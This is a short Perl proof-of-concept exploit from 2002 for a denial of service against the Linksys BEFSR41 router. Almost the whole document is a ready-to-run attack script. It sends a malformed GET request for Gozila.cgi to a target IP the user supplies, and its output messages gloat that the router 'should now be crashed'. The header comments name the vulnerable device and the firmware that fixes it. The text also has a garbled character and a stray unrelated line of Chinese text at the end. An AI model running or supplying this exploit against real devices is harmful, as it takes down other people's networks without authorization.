#!/usr/bin/perl -w # Proof of concept code # Linksys BEFSR41 EtherFast Cable/DSL Router Remote DoS by: Knight420 # Released: Oct.31.2002 # # The BEFSR41 crashes if a remote and/or local attacker accesses the script Gozila.cgi # using the router抯 IP address with no arguments. Remote exploitation requires that # the router's remote management be enabled. # Firmware version 1.42.7 and later fix this problem. # # Gr33tz: #opers myself << knight420 # use IO::Socket; if ($#ARGV<0) { system('clear '); print "\nLinksys BEFSR41 EtherFast Cable/DSL Router Remote DoS by: Knight420"; print "\n\n Usage: perl lostlink.pl ip\n\n"; exit; } $dos = ("GET /Gozila.cgi?| HTTP/1.0"); $connect = IO::Socket::INET ->new (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"80"); unless ($connect) { die "Cannot connect to host $ARGV[0]" } system('clear '); printf "Linksys BEFSR41 EtherFast Cable/DSL Router Remote DoS by: Knight420"; printf "\n*** [1] Server is up..."; printf "\n*** [2] Sending our elite code..."; print $connect "$dos"; printf "\n*** [3] Server should now be crashed\n\n"; close($connect);

亚洲欧美在线